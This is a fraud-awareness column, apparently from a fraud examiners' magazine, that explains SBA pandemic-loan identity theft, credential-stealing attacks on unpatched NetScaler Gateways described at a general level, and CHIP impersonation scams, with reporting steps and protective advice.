Fraudsters steal pandemic cash in your name, infect business web gateways, and pilfer children’s health insurance money and PII

Suzie Johnson recently received a mailed bill that said she had to start paying back her COVID-19 Economic Injury Disaster Loan (EIDL). Suzie was befuddled because she knew nothing about the EIDL program and never applied for one of its loans. She talked to her federal representative, and he advised her to contact the Small Business Administration (SBA) agency to report the problem, which told her that someone had stolen her identity and used it to apply for the loan. SBA then canceled the fraudulent loan, and Suzie’s problem was resolved. This fictitious case is representative of the recent SBA EIDL and PPP loan scam.

If you’ve received a bill for an SBA Paycheck Protection Program (PPP) or EIDL loan you never applied for, an identity thief probably has stolen your personally identifiable information (PII) to get the government loan in your name.

Here’s what to do to report the scam and initiate the SBA review process to help you resolve any credit problems:

Step 1. Report the identity theft to the Federal Trade Commission (FTC) at IdentityTheft.gov.

• You’ll receive an FTC identity theft report and a personal recovery plan. Save a copy of your report because you’ll need to submit it to the SBA.
• Follow the personal recovery plan to stop further misuse of your PII and help repair the damage the identity theft caused.

Step 2. Visit the SBA’s website.

• Follow the steps to report the identity theft to the SBA, which is required to start the review process.

Step 3. If the identity theft involved a PPP loan and you know the private lender that issued the loan, also contact that lender.

• Explain that an identity thief used your PII to get the PPP loan without your knowledge or authorization. Tell them the loan is fraudulent.
• Ask the lender to release you from the loan and to take all the steps needed to remove information about the loan from your credit files and to send you a letter explaining the actions it’s taken.
• Write down whom you spoke with and when. You may need to contact the lender again.
• Know that the lender may require a copy of your FTC identity theft report and other documents. Here’s a sample letter that can help you get started.

(See “What to do if you’re billed for an SBA EIDL or PPP loan you don’t owe,” by Rosario Méndez, FTC, Sept. 26, 2023.)

Fraudsters target unpatched NetScaler Gateways to steal users’ credentials

Here’s a warning to all organizations that offer customers all-in-one apps. (Think of apps for your bank or airline on your phone.) Fraudsters are continuing to attack a crucial “9.8 vulnerability” in unpatched “NetScaler Gateways,” according to an SC Media article. The NetScaler Gateway system appliance, sold to organizations, allows customers to access any app via the cloud from any device through a single URL, according to Citrix Systems, Inc. It consolidates “remote access infrastructure” to provide customers a single sign-on across all applications whether in a data center, in the cloud or if the apps are delivered as SaaS (software as a service), which allows users to connect to and use cloud-based apps over the internet. (Common SaaS examples are email, calendaring and office tools, such as Microsoft Office 365.) (See “Attacks on NetScaler Gateways aim for user credentials,” by Steve Zurier, SC Media, Oct. 10, 2023; “NetScaler Gateway,” by Hema Malina, Citrix staff and Subbendu Majumder, NetScaler, Aug. 18, 2023; and “What is SaaS?” Azure, Microsoft.)

The 9.8 level (out of 10) is part of the Common Vulnerabilities and Exposures (CVE) list, which the nonprofit MITRE corporation launched in 1999 to identify and categorize vulnerabilities in software and firmware. CVE is sponsored by the U.S. Department of Homeland Security Cybersecurity and Infrastructure Security Agency (CISA) and the U.S. Computer Emergency Readiness Team (US-CERT). (See “What is a CVE? Common Vulnerabilities and Exposures Explained,” by Abi Tyas Tunggal, UpGuard, April 6, 2023.)

During an attack, a fraudster inserts a malicious script, or “bug,” into the HTML content of the authentication web page to steal user credentials. Technically speaking, they do this by using the bug as a “zero day” to drop a “web shell” on a device that a customer is using. A zero-day attack happens when hackers or other malicious actors take advantage of a software or network vulnerability that’s unknown to developers. In other words, the developers have known about the vulnerability for zero days. Of course, it’s no longer considered a zero-day attack after it’s discovered.

According to “What are Web Shells?” on the Geeks for Geeks website, “A web shell is a malicious program [or script] that is used to access a web server remotely during cyberattacks … [and] is always used in conjunction with some other technique during the post-exploitation stage.” After a fraudster identifies vulnerabilities in a network’s systems or software, they upload a web shell on the victim’s network, which allows them to perform discovery on the victim’s “active directory” (AD) so they can create, delete, modify, download and steal files. An AD provides the methods to store information about user accounts, including passwords, telephone numbers and other PII, and allows authorized users on the same network to access this information.

Fraudsters can use stolen PII and other information to commit more fraud or sell it to other malicious actors for fraudulent purposes, including ransomware.

Irfan Asrar, director of threat research at Qualys, and Joseph Carson, chief security scientist and advisory chief information security officer at software company Delinea, provide advice in an SC Media article to protect PII and other valuable information:

• Once a victim organization has discovered a vulnerability, administrators should immediately patch it and check for any signs of a breach.
• Employ strong passwords.
• Ensure strong controls, such as multi-factor authentication and privileged access security, are in place.
• Never reuse credentials for multiple applications because one compromised account could open the doors to other accounts. (See “Attacks on NetScaler Gateways aim for user credentials,” by Steve Zurier, SC Media, Oct. 10, 2023.)

Children’s health insurance scam

According to the FTC, fraudsters, who are masquerading as officials representing the Medicaid Children’s Health Insurance Program (CHIP), are calling potential victims and asking them for their PII or demanding that they pay to renew their family coverage. Medicaid and CHIP are joint federal/state programs. Each state is responsible for governing all aspects of the administration and operation of its Medicaid and CHIP programs.

The FTC offers advice to protect families from this scam:

1. CHIP won’t charge you to renew or enroll. CHIP may reach out to you by email, phone or text messages to renew your coverage, but they won’t ask you to pay. They also won’t ask for your PII, such as your bank account and credit card numbers.
2. Don’t click on links in text or email messages even if it looks like the message is from your state’s Medicaid agency. That’s a scam. Find your state’s Medicaid agency on Medicaid.gov. Then contact that agency to get more information.
3. Start at HealthCare.gov to compare insurance plans, coverage and eligibility. The site requires information about your monthly income and age to give you a quote. If anyone or any site asks for your financial information, such as your bank account or credit card number, to get a quote, that’s a scam.
4. Medical discount plans aren’t medical insurance. (See “Medical Discount Plans and Scams,” FTC.) Scammers often pitch medical discount plans by convincing people they’re the same as insurance — but they’re not. They often just take your money for very little in return.

If you spot a CHIP scam, report it to the FTC at ReportFraud.ftc.gov. (Also, see “Children’s Health Insurance Program: Spot the scam,” by Marissa Hopkins, FTC, Sept. 22, 2023.)

I’m here to help

Please use information about these scams in your outreach programs and among your family members, friends and co-workers.

As part of my outreach program, please contact me if you have any questions on identity theft or cyber-related issues that you need help with or if you’d like me to research a scam and possibly include details in future columns or as feature articles.

I don’t have all the answers, but I’ll do my best to help. I might not get back to you immediately, but I’ll reply. Stay tuned!

Robert E. Holtfreter, Ph.D., CFE, is a distinguished professor of accounting and research at Central Washington University. He’s a member of the Accounting Council for the Gerson Lehrman Group, a research consulting organization, and a member of the White Collar Crime Research Consortium Advisory Council. He’s also the vice president of the ACFE’s Pacific Northwest Chapter and serves on the ACFE Advisory Council and the Editorial Advisory Committee, and he was recently selected to serve on the ACFE’s inaugural CFE Exam Content Development Committee. Holtfreter was the recipient of the Hubbard Award for the best Fraud Magazine feature article in 2016. Contact him at doctorh007@gmail.com.